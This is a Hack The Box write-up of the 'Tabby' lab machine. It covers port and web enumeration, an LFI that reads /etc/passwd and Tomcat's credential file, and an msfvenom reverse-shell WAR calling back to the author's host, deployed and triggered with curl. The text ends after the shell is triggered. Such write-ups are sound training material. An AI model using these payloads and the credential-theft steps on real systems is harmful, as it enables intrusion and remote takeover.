Hack The Box: Tabby Write-Up

Overview

This write-up documents the methods I used to compromise the Tabby machine on the Hack The Box internal Labs network. These methods include enumerating the machine with Nmap, Gobuster, and manual inspection; abusing an LFI in a vulnerable PHP file; and abusing authenticated file uploads on Apache Tomcat 9 to gain a foothold. They also involve cracking a password-protected archive and abusing password reuse to pivot to another user. Finally, I detail the steps I took to leverage a user's membership in the lxd group into a full root-level shell. Tabby was an Easy-rated Linux box created by egre55, worth 20 points while it was active.

Kill Chain

Automated Enumeration

I began this machine by using Nmap to run a full TCP port scan against the target host.

While executing Nmap, I used the -vv flag to display more verbose output, --reason to display the reason a port is in a particular state, -Pn to skip the host discovery checks, -A to enable OS and version detection, --osscan-guess to enable aggressive OS guessing, --version-all to try every single version probe, and -p- to scan the entire range of potential TCP ports.

nmap -vv --reason -Pn -A --osscan-guess --version-all -p- -oN _full_tcp_nmap.txt 10.10.10.194

Increasing send delay for 10.10.10.194 from 0 to 5 due to 32 out of 106 dropped probes since last increase.

Nmap scan report for 10.10.10.194

Host is up, received user-set (0.098s latency).

Scanned at 2020-07-08 14:01:34 EST for 1185s

Not shown: 65532 closed ports

Reason: 65532 resets

PORT STATE SERVICE REASON VERSION

22/tcp open ssh syn-ack from 10.10.14.1 ttl 63 OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)

| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDv5dlPNfENa5t2oe/3IuN3fRk9WZkyP83WGvRByWfBtj3aJH1wjpPJMUTuELccEyNDXaUnsbrhgH76eGVQAyF56DnY3QxWlt82MgHTJWDwdt4hKMDLNKlt+i+sElqhYwXPYYWfuApFKiAUr+KGvnk9xJrhZ9/bAp+rW84LyeJOSZ8iqPVAdcjve5As1O+qcSAUfIHlZGRzkVuUuOq2wxUvegKsYnmKWUZW1E/fRq3tJbqJ5Z0JwDklN21HR4dmM7/VTHQ/AaTl/JnQxOLFUlryXAFbjgLa1SDOTBDOG72j2/II2hdeMOKN8YZN9DHgt6qKiyn0wJvSE2nddC2BbnGzamJlnQaXOpSb3+WDHP+JMxQJQrRxFoG4R6X2c0rx+yM5XnYHur9cQXC9fp+lkxQ8TtkMijbPlS2umFYcd9WrMdtEbSeKbaozi9YwbR9MQh8zU2cBc7T9p3395HAWt/wCcK9a61XrQY/XDr5OSF2MI5ESVG9e0t8jG9Q0opFo19U=

| 256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)

| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDeYRLCeSORNbRhDh42glSCZCYQXeOAM2EKxfk5bjXecQyV5W7DYsEqMkFgd76xwdGtQtNVcfTyXeLxyk+lp9HE=

| 256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)

|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKHA/3Dphu1SUgMA6qPzqzm6lH2Cuh0exaIRQqi4ST8y

80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))

|_http-favicon: Unknown favicon MD5: 338ABBB5EA8D80B9869555ECA253D49D

| http-methods:

|_ Supported Methods: GET HEAD POST OPTIONS

|_http-server-header: Apache/2.4.41 (Ubuntu)

|_http-title: Mega Hosting

8080/tcp open http syn-ack ttl 63 Apache Tomcat

| http-methods:

|_ Supported Methods: OPTIONS GET HEAD POST

|_http-open-proxy: Proxy might be redirecting requests

|_http-title: Apache Tomcat

Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), Linux 5.3 - 5.4 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 3.1 - 3.2 (92%)

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

TCP/IP fingerprint:

OS:SCAN(V=7.91%E=4%D=11/5%OT=22%CT=1%CU=33681%PV=Y%DS=2%DC=T%G=Y%TM=5FA47AD

OS:F%P=x86_64-pc-linux-gnu)SEQ(SP=FB%GCD=1%ISR=105%TI=Z%CI=Z%II=I%TS=A)SEQ(

OS:SP=FB%GCD=1%ISR=105%TI=Z%CI=Z%TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=

OS:M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=FE88%W2=FE

OS:88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7

OS:%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=

OS:Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%

OS:RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0

OS:%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIP

OS:CK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 10.146 days (since Sun Jun 28 11:50:59 2020)

Network Distance: 2 hops

TCP Sequence Prediction: Difficulty=251 (Good luck!)

IP ID Sequence Generation: All zeros

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 993/tcp)

HOP RTT ADDRESS

1 50.53 ms 10.10.14.1

2 48.16 ms 10.10.10.194

Read data files from: /usr/bin/../share/nmap

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

# Nmap done at Wed Jul 8 14:21:19 2020 -- 1 IP address (1 host up) scanned in 1185.23 seconds

One interesting thing I noted in this scan result was that the service banner on tcp/8080 indicated this server was running Apache Tomcat, and that the http-open-proxy script suggested connections to tcp/8080 might be proxied to another TCP port or location.
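
To feed the follow-up, service-specific scans, the open ports can be pulled out of the saved scan file with standard tools. This is a minimal sketch that assumes the normal-format (-oN) layout shown above; the function name open_tcp_ports is hypothetical and not part of Nmap.

```shell
# Print the open TCP ports found in an Nmap normal-format (-oN) output file,
# one per line. Matches lines such as "22/tcp open ssh ...".
open_tcp_ports() {
    grep -E '^[0-9]+/tcp[[:space:]]+open' "$1" | cut -d/ -f1
}

# Example: join the ports with commas so they can be passed to a later "-p".
# open_tcp_ports _full_tcp_nmap.txt | paste -sd, -
```

Script output lines start with a pipe character, so they are ignored by the pattern and only the port table rows are kept.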

I followed this scan up with a service-specific Nmap script scan on the SSH service listening on tcp/22. I added the -sV flag to have Nmap probe the port to determine the service/version info, -p to specify port 22, and --script="" to specify which Nmap script modules to run.

nmap -vv --reason -Pn -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN tcp_22_ssh_nmap.txt 10.10.10.194

Nmap scan report for 10.10.10.194

Host is up, received user-set (0.15s latency).

Scanned at 2020-11-05 17:40:27 EST for 2s

PORT STATE SERVICE REASON VERSION

22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)

|_banner: SSH-2.0-OpenSSH_8.2p1 Ubuntu-4

| ssh-auth-methods:

| Supported authentication methods:

|_ publickey

| ssh-hostkey:

| 3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)

| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDv5dlPNfENa5t2oe/3IuN3fRk9WZkyP83WGvRByWfBtj3aJH1wjpPJMUTuELccEyNDXaUnsbrhgH76eGVQAyF56DnY3QxWlt82MgHTJWDwdt4hKMDLNKlt+i+sElqhYwXPYYWfuApFKiAUr+KGvnk9xJrhZ9/bAp+rW84LyeJOSZ8iqPVAdcjve5As1O+qcSAUfIHlZGRzkVuUuOq2wxUvegKsYnmKWUZW1E/fRq3tJbqJ5Z0JwDklN21HR4dmM7/VTHQ/AaTl/JnQxOLFUlryXAFbjgLa1SDOTBDOG72j2/II2hdeMOKN8YZN9DHgt6qKiyn0wJvSE2nddC2BbnGzamJlnQaXOpSb3+WDHP+JMxQJQrRxFoG4R6X2c0rx+yM5XnYHur9cQXC9fp+lkxQ8TtkMijbPlS2umFYcd9WrMdtEbSeKbaozi9YwbR9MQh8zU2cBc7T9p3395HAWt/wCcK9a61XrQY/XDr5OSF2MI5ESVG9e0t8jG9Q0opFo19U=

| 256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)

| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDeYRLCeSORNbRhDh42glSCZCYQXeOAM2EKxfk5bjXecQyV5W7DYsEqMkFgd76xwdGtQtNVcfTyXeLxyk+lp9HE=

| 256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)

|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKHA/3Dphu1SUgMA6qPzqzm6lH2Cuh0exaIRQqi4ST8y

| ssh2-enum-algos:

| kex_algorithms: (9)

| curve25519-sha256

| curve25519-sha256@libssh.org

| ecdh-sha2-nistp256

| ecdh-sha2-nistp384

| ecdh-sha2-nistp521

| diffie-hellman-group-exchange-sha256

| diffie-hellman-group16-sha512

| diffie-hellman-group18-sha512

| diffie-hellman-group14-sha256

| server_host_key_algorithms: (5)

| rsa-sha2-512

| rsa-sha2-256

| ssh-rsa

| ecdsa-sha2-nistp256

| ssh-ed25519

| encryption_algorithms: (6)

| chacha20-poly1305@openssh.com

| aes128-ctr

| aes192-ctr

| aes256-ctr

| aes128-gcm@openssh.com

| aes256-gcm@openssh.com

| mac_algorithms: (10)

| umac-64-etm@openssh.com

| umac-128-etm@openssh.com

| hmac-sha2-256-etm@openssh.com

| hmac-sha2-512-etm@openssh.com

| hmac-sha1-etm@openssh.com

| umac-64@openssh.com

| umac-128@openssh.com

| hmac-sha2-256

| hmac-sha2-512

| hmac-sha1

| compression_algorithms: (2)

| none

|_ zlib@openssh.com

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

# Nmap done at Thu Nov 5 17:40:29 2020 -- 1 IP address (1 host up) scanned in 3.41 seconds

I made a note that the OpenSSH server listening on tcp/22 was only configured to allow publickey authentication, which meant that I would not be able to reuse stolen credentials to log in to the target host over SSH.

Next I ran an HTTP Nmap script scan against the service listening on tcp/80 using the same additional flags but with HTTP-specific Nmap scripts.

nmap -vv --reason -Pn -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN tcp_80_http_nmap.txt 10.10.10.194

Nmap scan report for 10.10.10.194

Host is up, received user-set (0.080s latency).

Scanned at 2020-11-05 17:44:03 EST for 60s

PORT STATE SERVICE REASON VERSION

80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))

|_http-chrono: Request times for /; avg: 541.90ms; min: 298.70ms; max: 714.04ms

| http-comments-displayer:

| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.194

|

| Path: http://10.10.10.194:80/

| Line number: 22

| Comment:

| <!--For Plugins external css-->

|

| Path: http://10.10.10.194:80/

| Line number: 19

| Comment:

| <!-- <link rel="stylesheet" href="assets/css/bootstrap-theme.min.css">-->

|

| ...

|

| ...

|

| Path: http://10.10.10.194:80/

| Line number: 46

| Comment:

| <!-- Brand and toggle get grouped for better mobile display -->

|

| Path: http://10.10.10.194:80/assets/js/main.js

| Line number: 72

| Comment:

|

|_ // nav:false,

|_http-csrf: Couldn't find any CSRF vulnerabilities.

|_http-date: Thu, 05 Nov 2020 23:04:48 GMT; +20m33s from local time.

|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.

|_http-dombased-xss: Couldn't find any DOM based XSS.

|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)

| http-errors:

| Spidering limited to: maxpagecount=40; withinhost=10.10.10.194

| Found the following error pages:

|

| Error Code: 404

|_ http://10.10.10.194:80/assets/css/bootstrap-theme.min.css

|_http-favicon: Unknown favicon MD5: 338ABBB5EA8D80B9869555ECA253D49D

|_http-feed: Couldn't find any feeds.

|_http-fetch: Please enter the complete path of the directory to save data in.

| http-grep:

| (2) http://10.10.10.194:80/:

| (2) email:

| + sales@megahosting.htb

| + sales@megahosting.com

| (1) http://10.10.10.194:80/assets/css/bootstrap-theme.min.css:

| (1) ip:

| + 10.10.10.194

| (1) http://10.10.10.194:80/assets/js/jquery.easypiechart.min.js:

| (1) email:

|_ + rendro87@gmail.com

| http-headers:

| Date: Thu, 05 Nov 2020 23:04:52 GMT

| Server: Apache/2.4.41 (Ubuntu)

| Vary: Accept-Encoding

| Connection: close

| Transfer-Encoding: chunked

| Content-Type: text/html; charset=UTF-8

|

|_ (Request type: GET)

|_http-jsonp-detection: Couldn't find any JSONP endpoints.

|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable

|_http-malware-host: Host appears to be clean

| http-methods:

|_ Supported Methods: GET HEAD POST OPTIONS

|_http-mobileversion-checker: No mobile version detected.

| http-php-version: Logo query returned unknown hash 82228fa8b8c638b6c1eaa455bc872e0c

|_Credits query returned unknown hash 82228fa8b8c638b6c1eaa455bc872e0c

|_http-referer-checker: Couldn't find any cross-domain scripts.

|_http-security-headers:

|_http-server-header: Apache/2.4.41 (Ubuntu)

| http-sitemap-generator:

| Directory structure:

| /

| Other: 1; png: 1

| /assets/css/

| css: 6

| /assets/fonts/

| css: 1

| /assets/js/

| js: 4

| /assets/js/vendor/

| js: 4

| Longest directory structure:

| Depth: 3

| Dir: /assets/js/vendor/

| Total files found (by extension):

|_ Other: 1; css: 7; js: 8; png: 1

|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

|_http-title: Mega Hosting

| http-useragent-tester:

| Status for browser useragent: 200

| Allowed User Agents:

| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)

| libwww

| lwp-trivial

| libcurl-agent/1.0

| PHP/

| Python-urllib/2.5

| GT::WWW

| Snoopy

| MFC_Tear_Sample

| HTTP::Lite

| PHPCrawl

| URI::Fetch

| Zend_Http_Client

| http client

| PECL::HTTP

| Wget/1.13.4 (linux-gnu)

|_ WWW-Mechanize/1.34

| http-vhosts:

| 120 names had status 200

| intranet

| s3

| sql

| ssl

| backup

| dmz

| svn

|_apache

|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)

|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)

|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php

Read data files from: /usr/bin/../share/nmap

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

# Nmap done at Thu Nov 5 17:45:03 2020 -- 1 IP address (1 host up) scanned in 61.88 seconds

The http-grep module was also able to detect two email addresses with domains that matched the HTTP title, sales@megahosting.htb and sales@megahosting.com.

After reviewing these results, I started to fuzz the web root directory using Gobuster.

I ran Gobuster with the -o flag to set the output file, -u to specify the URL to fuzz, -w to specify the wordlist to use, -e to print the full URL for each successful result, -k to skip SSL certificate verification, -l to include the length of the body in the output, -s to specify positive status codes, -x to specify the file extensions to search for, and -z to suppress the progress display.

gobuster dir -u http://10.10.10.194:80/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -e -k -l -s "200,204,301,302,307,401,403,500" -x "txt,html,php,asp,aspx,jsp" -z -o tcp_80_http_gobuster.txt

http://10.10.10.194:80/news.php (Status: 200) [Size: 0]

http://10.10.10.194:80/index.php (Status: 200) [Size: 14175]

http://10.10.10.194:80/files (Status: 301) [Size: 312]

http://10.10.10.194:80/assets (Status: 301) [Size: 313]

The fuzz scan returned four results. Since two of them were files and I knew that the /assets folder is typically just generic CSS and JS template files, I decided to fuzz the /files folder next. I used the same command flags, but I switched to a larger wordlist. I made this switch because I knew I would be fuzzing for more specific file and folder names in the /files subdirectory, and I was willing to trade a longer scan duration for wider coverage.

gobuster dir -u http://10.10.10.194:80/files/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k -l -s "200,204,301,302,307,403,500" -x "txt,html,php,asp,aspx,jsp" -z -o tcp_80_http_gobuster-files.txt

http://10.10.10.194:80/files/archive (Status: 301) [Size: 320]

http://10.10.10.194:80/files/statement (Status: 200) [Size: 6507]
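
The triage step of choosing which results to fuzz next can be sketched as a small filter over the saved Gobuster output. This assumes the output format shown above (full URL first, then the status in parentheses); the function name redirected_paths is hypothetical. On Apache, a 301 for a path without a trailing slash usually indicates a directory.

```shell
# Read Gobuster "dir" output on stdin and print the URLs that returned a
# 301 redirect, which are the likely directories worth fuzzing further.
redirected_paths() {
    awk '/\(Status: 301\)/ { print $1 }'
}

# Example:
# redirected_paths < tcp_80_http_gobuster.txt
```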

Finally, I ran the same Nmap HTTP script scans against the Apache Tomcat service listening on tcp/8080.

nmap -vv --reason -Pn -sV -p 8080 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN tcp_8080_http_nmap.txt 10.10.10.194

# Nmap 7.91 scan initiated Fri Nov 6 08:10:57 2020 as: nmap -vv --reason -Pn -sV -p 8080 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN tcp_8080_http_nmap.txt 10.10.10.194

Nmap scan report for 10.10.10.194

Host is up, received user-set (0.041s latency).

Scanned at 2020-11-06 08:10:58 EST for 131s

PORT STATE SERVICE REASON VERSION

8080/tcp open http syn-ack ttl 63 Apache Tomcat

| http-auth-finder:

| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.194

| url method

| http://10.10.10.194:8080/host-manager/html HTTP: Basic

|_ http://10.10.10.194:8080/manager/html HTTP: Basic

|_http-chrono: Request times for /; avg: 349.52ms; min: 184.75ms; max: 522.34ms

| http-comments-displayer:

| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.194

|

| Path: http://10.10.10.194:8080/manager/html

| Line number: 6

| Comment:

| <!--

| BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;font-size:12px;}

| H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;}

| PRE, TT {border: 1px dotted #525D76}

| A {color : black;}A.name {color : black;}

| -->

|

| Path: http://10.10.10.194:8080/examples/servlets

| Line number: 1

| Comment:

| <!--

| Licensed to the Apache Software Foundation (ASF) under one or more

| contributor license agreements. See the NOTICE file distributed with

| this work for additional information regarding copyright ownership.

| The ASF licenses this file to You under the Apache License, Version 2.0

| (the "License"); you may not use this file except in compliance with

| the License. You may obtain a copy of the License at

|

| http://www.apache.org/licenses/LICENSE-2.0

|

| Unless required by applicable law or agreed to in writing, software

| distributed under the License is distributed on an "AS IS" BASIS,

| WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.

| See the License for the specific language governing permissions and

| limitations under the License.

| -->

|

| Path: http://10.10.10.194:8080/docs/default-servlet.html

| Line number: 3

| Comment:

| // Enable strict mode

|

| Path: http://10.10.10.194:8080/docs/default-servlet.html

| Line number: 7

| Comment:

| // Workaround for IE <= 11

|

| Path: http://10.10.10.194:8080/docs/jspapi/index.html

| Line number: 1

| Comment:

| <!--

| Licensed to the Apache Software Foundation (ASF) under one or more

| contributor license agreements. See the NOTICE file distributed with

| this work for additional information regarding copyright ownership.

| The ASF licenses this file to You under the Apache License, Version 2.0

| (the "License"); you may not use this file except in compliance with

| the License. You may obtain a copy of the License at

|

| http://www.apache.org/licenses/LICENSE-2.0

|

| Unless required by applicable law or agreed to in writing, software

| distributed under the License is distributed on an "AS IS" BASIS,

| WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.

| See the License for the specific language governing permissions and

| limitations under the License.

|_ -->

|_http-csrf: Couldn't find any CSRF vulnerabilities.

|_http-date: Fri, 06 Nov 2020 13:31:41 GMT; +20m35s from local time.

| http-default-accounts:

| [Apache Tomcat] at /manager/html/

| (no valid default credentials found)

| [Apache Tomcat Host Manager] at /host-manager/html/

|_ (no valid default credentials found)

|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.

|_http-dombased-xss: Couldn't find any DOM based XSS.

|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)

| http-enum:

| /examples/: Sample scripts

| /manager/html/upload: Apache Tomcat (401 )

| /manager/html: Apache Tomcat (401 )

|_ /docs/: Potentially interesting folder

| http-errors:

| Spidering limited to: maxpagecount=40; withinhost=10.10.10.194

| Found the following error pages:

|

| Error Code: 401

| http://10.10.10.194:8080/host-manager/html

|

| Error Code: 401

| http://10.10.10.194:8080/manager/html

|

| Error Code: 404

|_ http://10.10.10.194:8080/docs/extras.html

|_http-feed: Couldn't find any feeds.

|_http-fetch: Please enter the complete path of the directory to save data in.

| http-grep:

| (2) http://10.10.10.194:8080/docs/realm-howto.html:

| (2) email:

| + j.jones@mycompany.com

| + f.bloggs@mycompany.com

| (1) http://10.10.10.194:8080/docs/monitoring.html:

| (1) ip:

|_ + 192.168.111.1

| http-headers:

| Accept-Ranges: bytes

| ETag: W/"1895-1589929768022"

| Last-Modified: Tue, 19 May 2020 23:09:28 GMT

| Content-Type: text/html

| Content-Length: 1895

| Date: Fri, 06 Nov 2020 13:31:40 GMT

| Connection: close

|

|_ (Request type: HEAD)

|_http-iis-webdav-vuln: WebDAV is DISABLED. Server is not currently vulnerable.

|_http-jsonp-detection: Couldn't find any JSONP endpoints.

|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable

|_http-malware-host: Host appears to be clean

| http-methods:

|_ Supported Methods: OPTIONS GET HEAD POST

|_http-mobileversion-checker: No mobile version detected.

| http-php-version: Logo query returned unknown hash 90f2cbc7fd28e7ed99f3254ab0f9a9ed

|_Credits query returned unknown hash 90f2cbc7fd28e7ed99f3254ab0f9a9ed

|_http-referer-checker: Couldn't find any cross-domain scripts.

|_http-security-headers:

| http-sitemap-generator:

| Directory structure:

| /

| Other: 1

| /docs/

| Other: 1; html: 10

| /docs/config/

| html: 1

| /docs/jspapi/

| html: 1

| /examples/

| Other: 3

| /examples/websocket/

| xhtml: 1

| Longest directory structure:

| Depth: 2

| Dir: /examples/websocket/

| Total files found (by extension):

|_ Other: 5; html: 12; xhtml: 1

|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

|_http-title: Apache Tomcat

| http-useragent-tester:

| Status for browser useragent: 200

| Allowed User Agents:

| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)

| libwww

| lwp-trivial

| libcurl-agent/1.0

| PHP/

| Python-urllib/2.5

| GT::WWW

| Snoopy

| MFC_Tear_Sample

| HTTP::Lite

| PHPCrawl

| URI::Fetch

| Zend_Http_Client

| http client

| PECL::HTTP

| Wget/1.13.4 (linux-gnu)

|_ WWW-Mechanize/1.34

| http-vhosts:

|_128 names had status 200

| http-waf-detect: IDS/IPS/WAF detected:

|_10.10.10.194:8080/?p4yl04d3=<script>alert(document.cookie)</script>

|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)

|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php

Read data files from: /usr/bin/../share/nmap

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

# Nmap done at Fri Nov 6 08:13:09 2020 -- 1 IP address (1 host up) scanned in 132.03 seconds

Manual Enumeration



The Nmap scripts discovered two subdirectories that I made note of, /host-manager and /manager, as well as an upload endpoint at /manager/html/upload. The http-default-accounts script also informed me that the pages at /host-manager/html and /manager/html both required authentication to view, and that none of the default Tomcat credentials it tried were valid. Since the site on tcp/80 didn't appear to be a template, I decided to take a look at it first. I proxied my connection through Burp Suite, then hit the home page in my browser.

Reviewing the banner menu at the top of the page, I noticed there was a link named 'NEWS'. I also remembered there had been a file named 'news.php' discovered during my initial Gobuster fuzzing. Curious to see what content the news.php file would serve, I clicked on the link, but the page didn't load.



The page didn't load because I hadn't added the target host's hostname to my /etc/hosts file, and the link was redirecting me to the full URL of the site. I also noticed that the URI appeared to include a file inclusion parameter, and I recognized the filename statement from my Gobuster fuzzing as well. I updated the URL to point to my localhost Burp Suite proxy and requested the page again.

It looked like the news.php tool was removed, and the administrators were sourcing a Breach Disclosure Statement from /files/statement with a PHP file include argument.



To verify that news.php was vulnerable to an LFI attack, I attempted to dump the contents of /etc/passwd.
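
A request like this is just the include parameter with a chain of ../ segments in front of the target path. The sketch below builds such a URL; the parameter name and traversal depth are passed in as arguments because the write-up only shows them in screenshots, so any value used here (for example "file") is an assumption, as is the helper name lfi_url.

```shell
# Build a path-traversal URL for a file-include parameter.
# Arguments: script URL, parameter name, number of "../" segments, target path.
lfi_url() {
    base=$1
    param=$2
    depth=$3
    target=$4
    prefix=""
    i=0
    while [ "$i" -lt "$depth" ]; do
        prefix="../$prefix"
        i=$((i + 1))
    done
    # Drop the leading slash so the target is appended to the "../" chain.
    printf '%s?%s=%s%s\n' "$base" "$param" "$prefix" "${target#/}"
}

# Example (parameter name "file" is an assumption):
# curl -s "$(lfi_url http://10.10.10.194/news.php file 4 /etc/passwd)"
```

Using more ../ segments than strictly needed is harmless, since traversal above the filesystem root stays at the root.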

The only non-service account I saw other than root in the /etc/passwd dump was the user ash. I tried to dump that user's private RSA key from /home/ash/.ssh/id_rsa with the LFI exploit but was unsuccessful. I decided to shelve this LFI for the moment and continue with my manual enumeration.
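
Picking the interactive accounts out of a passwd dump can be done with a one-line filter rather than by eye. This is a rough heuristic sketch: it treats any account whose login shell ends in "sh" (sh, bash, zsh, and so on) as a candidate, which is an assumption that will not hold on every system. The function name login_accounts is hypothetical.

```shell
# Read passwd-format text on stdin and print "name:uid:shell" for accounts
# whose login shell ends in "sh"; nologin and false entries are skipped.
login_accounts() {
    awk -F: '$7 ~ /sh$/ { print $1 ":" $3 ":" $7 }'
}

# Example, with the dump saved to a local file named passwd.txt:
# login_accounts < passwd.txt
```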



Next I browsed to the HTTP service on tcp/8080. The page was a default Tomcat post-installation message. Reading the page informed me that the service on this port was Apache Tomcat 9. It also informed me that the Tomcat installation home was set to /usr/share/tomcat9, and that JSP packages were supported by the Tomcat instance.

At this point, I knew three things: the target host supported JSP execution, meaning that it could execute a .war payload; authenticated file upload should be possible due to the presence of the /manager/html/upload endpoint; and I could dump readable files from the target host with the /news.php LFI.



I turned to Google in order to determine how Tomcat 9 authenticated administrator users, where I learned that it stored authentication credentials in the /etc/tomcat-users.xml file. I attempted to use the LFI in news.php to dump that file.

I wasn't able to successfully dump the file. This was odd, since most files in /etc are world-readable. While I was thinking about this, I remembered that the Tomcat post-installation page on tcp/8080 had referenced the installation path being set to CATALINA_HOME=/usr/share/tomcat9, so I tried to target /usr/share/tomcat9/etc/tomcat-users.xml with the LFI.



The LFI was successful and I was able to view the admin credentials, which were stored in cleartext. I was also able to see that the user tomcat was assigned to both the admin-gui and manager-script roles.
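
The roles matter as much as the password here, because Tomcat gates each management interface by role: manager-script is the role that permits the text interface under /manager/text. A small sketch for listing users and roles from a saved copy of the file follows. It assumes each user element sits on one line with double-quoted attributes in the usual username, password, roles order, and it does not skip users inside XML comments. The function name tomcat_users is hypothetical.

```shell
# Read tomcat-users.xml on stdin and print "username<TAB>password<TAB>roles"
# for every line containing a <user ...> element. Splitting on double quotes
# puts the three attribute values in fields 2, 4, and 6.
tomcat_users() {
    awk -F'"' '/<user[[:space:]]/ { print $2 "\t" $4 "\t" $6 }'
}

# Example, with the dump saved locally:
# tomcat_users < tomcat-users.xml
```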



I used the stolen tomcat:$3cureP4s5w0rd123! credentials to authenticate to the portal at /manager/html. The authentication appeared to be successful, but I was unable to actually view the page. The error message I was presented with informed me that this was because I had to connect from the localhost.



I also tried to authenticate to the page at /host-manager/html and was successful.

With access to the Tomcat Virtual Host Manager page, I should have had the ability to use the Add Virtual Host tool to upload WAR files to the server. I have actually used that exact method in other labs, so I prepared a shellcode payload with msfvenom.

I used the -p flag to specify the java/jsp_shell_reverse_tcp payload since the target was Apache Tomcat, lhost= to specify the IP of my Kali host for the reverse shell to connect back to, lport= to specify the port nc would be listening on, and -f to specify the war output format.

msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.15.55 lport=443 -f war > rev443.war



I was unable to use the tools available at /host-manager/html to successfully upload the WAR file and deploy the new virtual host. I saw links to Tomcat documentation on the /host-manager/html page, so I began reading. While reading the Host Manager Help page, I discovered that I should have the ability to deploy a WAR by issuing an add command to the Tomcat server via a POST request.

I tweaked the sample curl command slightly before executing it. I added the --upload-file flag to push my WAR payload to the server, and I sent the credentials in the URI instead of using the -u flag. After the application was successfully deployed, I triggered the shellcode payload with another curl command.

curl --upload-file rev443.war 'http://tomcat:$3cureP4s5w0rd123!@10.10.10.194:8080/manager/text/deploy?path=/new-news'

OK - Deployed application at context path [/new-news]

curl http://10.10.10.194:8080/new-news/
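
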